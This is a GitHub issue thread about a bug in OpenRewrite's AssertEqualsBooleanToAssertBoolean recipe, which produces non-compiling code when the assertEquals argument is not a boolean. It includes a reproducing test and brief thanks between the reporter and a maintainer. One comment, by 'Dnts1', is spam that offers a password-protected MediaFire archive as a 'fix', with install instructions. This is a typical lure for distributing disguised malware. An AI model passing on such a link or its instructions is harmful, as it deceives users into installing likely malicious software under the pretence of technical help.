### ISSUE TITLE
`AssertEqualsBooleanToAssertBoolean` should not match when using non-boolean argument

### ISSUE THREAD

**Issue by protocol7** [openrewrite/rewrite-testing-frameworks#587]
## What version of OpenRewrite are you using?
    org.openrewrite:rewrite-core:8.33.8
    org.openrewrite.recipe:rewrite-testing-frameworks:2.16.0

## What is the smallest, simplest way to reproduce the problem?

When using org.openrewrite.java.testing.cleanup.AssertEqualsBooleanToAssertBoolean, the `actual` parameter of `assertEquals` is a non-boolean, converting to `assertFalse/assertTrue` will generate non-compiling code. The recipe should probably check for the type of the `actual` parameter.

Here's a somewhat contrived test case of the expected behaviour. We've run into this in our code base, e.g. with matching against values in a `Map<String, Object>`.

```java
  @Test
  void assertTrueWithNonBoolean() {
    rewriteRun(
        spec -> spec.recipe(new AssertEqualsBooleanToAssertBoolean()),
        java(
            // language=java
            """
            package com.helloworld;

            import static org.junit.jupiter.api.Assertions.assertEquals;

            public class Main {

             public void foo() {
               assertEquals(true, new Object());
             }
            }"""));
  }
```

## Are you interested in [contributing a fix to OpenRewrite](https://github.com/openrewrite/.github/blob/main/CONTRIBUTING.md#contributing-fixes)?

Possibly, but probably not short-term due to time constraints.

**Comment by Dnts1** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by protocol7** [comment]
12 minutes from report to fixed must be some form of record. Thanks!

**Comment by timtebeek** [comment]
> 12 minutes from report to fixed must be some form of record. Thanks!

Hah! Having that runnable test really helped, so thanks as well!
